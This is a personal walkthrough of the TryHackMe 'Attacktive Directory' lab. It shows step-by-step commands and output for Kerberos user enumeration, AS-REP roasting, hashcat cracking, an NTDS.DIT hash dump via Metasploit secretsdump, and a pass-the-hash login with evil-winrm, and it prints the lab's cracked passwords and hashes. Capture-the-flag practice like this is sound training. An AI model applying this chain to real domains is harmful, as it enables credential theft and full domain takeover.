Attacktive Directory
These notes are from a challenge I did @tryhackme called attacktivedirectory.
Prepare
Install Impacket, kerbrute, evil-winrm, Bloodhound and Neo4j:
sudo git clone <https://github.com/SecureAuthCorp/impacket.git> /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && sudo python3 ./setup.py install
sudo apt install bloodhound neo4j
go get github.com/ropnop/kerbrute
gem install evil-winrm
sudo apt update && sudo apt upgrade
Scan
Scan target withnmap -sC -sV 10.10.12.33
Nmap scan report for 10.10.12.33
Host is up (0.021s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-08-19 19:17:25Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2021-08-19T19:17:27+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2021-08-18T18:37:51
|_Not valid after: 2022-02-17T18:37:51
|_ssl-date: 2021-08-19T19:17:35+00:00; 0s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-08-19T19:17:29
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.37 seconds
Enumerating Users via Kerberos
Enumerate port 139/445 withenum4linux -U -o 10.10.12.33
Starting enum4linux v0.8.9 ( labs.portcullis.co.uk/application/enum4linux/ ) on Thu Aug 19 15:24:22 2021
==========================
| Target Information |
==========================
Target ........... 10.10.12.33
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===================================================
| Enumerating Workgroup/Domain on 10.10.12.33 |
===================================================
[E] Can't find workgroup/domain
====================================
| Session Check on 10.10.12.33 |
====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.12.33 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:
==========================================
| Getting domain SID for 10.10.12.33 |
==========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)
=====================================
| OS information on 10.10.12.33 |
=====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.12.33 from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.12.33 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
============================
| Users on 10.10.12.33 |
============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
enum4linux complete on Thu Aug 19 15:24:34 2021
Abusing Kerberos
ASREPRoasting with kerbrute and the provided userlist: ./kerbrute -domain spookysec.local -dc-ip 10.10.12.33 -users ~/userlist.txt
Impacket v0.9.24.dev1+20210814.5640.358fc7c6 - Copyright 2021 SecureAuth Corporation
[*] Valid user => james
[*] Valid user => svc-admin [NOT PREAUTH]
[*] Valid user => James
[*] Valid user => robin
[*] Blocked/Disabled user => guest
[*] Valid user => darkstar
[*] Valid user => administrator
[*] Valid user => backup
[*] Valid user => paradox
[*] Valid user => JAMES
[*] Valid user => Robin
[*] Blocked/Disabled user => Guest
[*] Valid user => Administrator
[*] Valid user => Darkstar
[*] Valid user => Paradox
[*] Valid user => DARKSTAR
[*] Valid user => ori
[*] Valid user => ROBIN
[*] Blocked/Disabled user => GUEST
[*] No passwords were discovered :'(
GetNPUsers.py spookysec.local/svc-admin -no-pass -dc-ip 10.10.12.33
Impacket v0.9.24.dev1+20210814.5640.358fc7c6 - Copyright 2021 SecureAuth Corporation
[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:fea34e6cdca777efe84cbdeaa48d35b9$cf364f98148fce49cc67dd350754a9c9ccf20dd516b1c2c6aecb6984aba91fca5b386b4ba7b59434f54440ecccdd549533157318a55752abe941976eae78132f61832fba98bc391ee52c51e924cd8d091b6e6d854bc16e769184867024f195936687839c4e63cf54f7a2e1749020c279e3b08f78826ca90deffcda9bdd721a87166fa6e9fe6f68cd493751df05b2ae92a0e5e466f8c674bf16c346e9ee9714f7098369d90dad8e5bac5b4ac316e94ff65acd8914a356450be18b671db831031c6a709369d586d704bc827f2221f3edfd60e5f675fb6ac97570e20bd094362e354b63279e757486c82162d6ae04467d7c1261
We recieved a Kerberos Ticket (Kerberos 5 AS-REP etype 23, mode 18200) which we can crack using hashcat and the provided passwordlist: hashcat -a 0 -m 18200 ~/example.hash ~/passwordlist.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Xeon(R) Platinum 8171M CPU @ 2.60GHz, 13896/13960 MB (4096 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 134 MB
Dictionary cache built:
* Filename..: /home/fab1/passwordlist.txt
* Passwords.: 70188
* Bytes.....: 569236
* Keyspace..: 70188
* Runtime...: 0 secs
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:fea34e6cdca777efe84cbdeaa48d35b9$cf364f98148fce49cc67dd350754a9c9ccf20dd516b1c2c6aecb6984aba91fca5b386b4ba7b59434f54440ecccdd549533157318a55752abe941976eae78132f61832fba98bc391ee52c51e924cd8d091b6e6d854bc16e769184867024f195936687839c4e63cf54f7a2e1749020c279e3b08f78826ca90deffcda9bdd721a87166fa6e9fe6f68cd493751df05b2ae92a0e5e466f8c674bf16c346e9ee9714f7098369d90dad8e5bac5b4ac316e94ff65acd8914a356450be18b671db831031c6a709369d586d704bc827f2221f3edfd60e5f675fb6ac97570e20bd094362e354b63279e757486c82162d6ae04467d7c1261:management2005
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:fea34e6cdca...7c1261
Guess.Base.......: File (/home/fab1/passwordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 158.0 kH/s (10.67ms) @ Accel:64 Loops:1 Thr:64 Vec:16
Recovered........: 1/1 (100.00%) Digests
Progress.........: 16384/70188 (23.34%)
Rejected.........: 0/16384 (0.00%)
Restore.Point....: 0/70188 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: m123456 -> cowgirlup
Started: 15:44:40
Stopped: 15:45:18
Back to the Basics
Let's enumerate any shares that the domain controller may be giving out with smbclient: smbclient -L \\\\10.10.12.33 -U svc-admin@spookysec.local
Enter svc-admin@spookysec.local's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
Backup seems like an interesting share. Let's view it's content: smbclient \\\\10.10.12.33\\backup -U svc-admin@spookysec.local
Enter svc-admin@spookysec.local's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Apr 4 15:08:39 2020
.. D 0 Sat Apr 4 15:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 15:08:53 2020
8247551 blocks of size 4096. 3636330 blocks available
smb: \> more backup_credentials.txt
backup_credentials.txt contains some kind of hash which we can try to identify e.g. with decodify: dcode YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
__ __
|/ | | / /
| | ___ ___ ___ ___| (
| )|___)| | )| )| |___ \ )
|__/ |__ |__ |__/ |__/ | | \_/
/
[+] Decoded from Base64 : backup@spookysec.local:backup2517860
Elevating Privileges within the Domain
Now that we know this is Base64 we can run this command to read the content: echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d
Running secretsdump.py didn't work for me e.g.: secretsdump.py spookysec.local/backup:backup2517860@10.10.12.33 -use-vss
So i used metasploit with secretsdump.py und set lhost, SMBDomain, RHOSTS, SMBPass and SMBUser accordingly: msfconsole
=[ metasploit v6.1.0-dev ]
+ -- --=[ 2157 exploits - 1146 auxiliary - 367 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: View all productivity tips with the
tips command
msf6 > search secretsdump
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/impacket/secretsdump normal No DCOM Exec
1 post/windows/gather/credentials/windows_sam_hivenightmare 2021-07-20 normal No Windows SAM secrets leak - HiveNightmare
2 auxiliary/gather/windows_secrets_dump normal No Windows Secrets Dump
Interact with a module by name or index. For example info 2, use 2 or use auxiliary/gather/windows_secrets_dump
msf6 > use auxiliary/scanner/smb/impacket/secretsdump
msf6 auxiliary(scanner/smb/impacket/secretsdump) > set lhost 10.9.193.173
lhost => 10.9.193.173
msf6 auxiliary(scanner/smb/impacket/secretsdump) > set SMBDomain spookysec.local
SMBDomain => spookysec.local
msf6 auxiliary(scanner/smb/impacket/secretsdump) > set RHOSTS 10.10.12.33
RHOSTS => 10.10.12.33
msf6 auxiliary(scanner/smb/impacket/secretsdump) > set SMBPass backup2517860
SMBPass => backup2517860
msf6 auxiliary(scanner/smb/impacket/secretsdump) > set SMBUser backup
SMBUser => backup
msf6 auxiliary(scanner/smb/impacket/secretsdump) > exploit
[*] Running for 10.10.12.33...
[-] 10.10.12.33 - RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] 10.10.12.33 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 10.10.12.33 - Using the DRSUAPI method to get NTDS.DIT secrets
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
[+] Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
[+] spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
[+] spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
[+] spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
[+] spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
[+] spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
[+] spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
[+] spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
[+] spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
[+] spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
[+] spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
[+] spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
[+] spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
[+] spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
[+] spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
[+] ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:42d07e838f3742f5c120ff5709cf684c:::
[*] 10.10.12.33 - Kerberos keys grabbed
[+] Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
[+] Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
[+] Administrator:des-cbc-md5:2079ce0e5df189ad
[+] krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
[+] krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
[+] krbtgt:des-cbc-md5:b94f97e97fabbf5d
[+] spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
[+] spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
[+] spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
[+] spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
[+] spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
[+] spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
[+] spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
[+] spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
[+] spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
[+] spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
[+] spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
[+] spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
[+] spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
[+] spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
[+] spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
[+] spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
[+] spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
[+] spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
[+] spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
[+] spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
[+] spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
[+] spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
[+] spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
[+] spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
[+] spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
[+] spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
[+] spookysec.local\paradox:des-cbc-md5:83988983f8b34019
[+] spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
[+] spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
[+] spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
[+] spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
[+] spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
[+] spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
[+] spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
[+] spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
[+] spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
[+] spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
[+] spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
[+] spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
[+] spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
[+] spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
[+] spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
[+] ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:4d608519152181fd16cfce52eba869dc3620ed788902a87b6f218f756c79c4ab
[+] ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:872f3e7f6d4ecdd33af0d0b934161b92
[+] ATTACKTIVEDIREC$:des-cbc-md5:9426b6febf6dc2ab
[*] 10.10.12.33 - Cleaning up...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Secretsdump.py uses the DRSUAPI method to get NTDS.DIT secrets. We can feed evil-winrm with the hash of the adminstrator to gain access using this command: evil-winrm -i 10.10.12.33 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
Evil-WinRM shell v3.2
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> more root.txt
*Evil-WinRM* PS C:\Users\backup\Desktop> more PrivEsc.txt
*Evil-WinRM* PS C:\Users\svc-admin\Desktop> more user.txt.txt
Whoop Whoop, now we have the flags for Administrator, backup and svc-admin ^^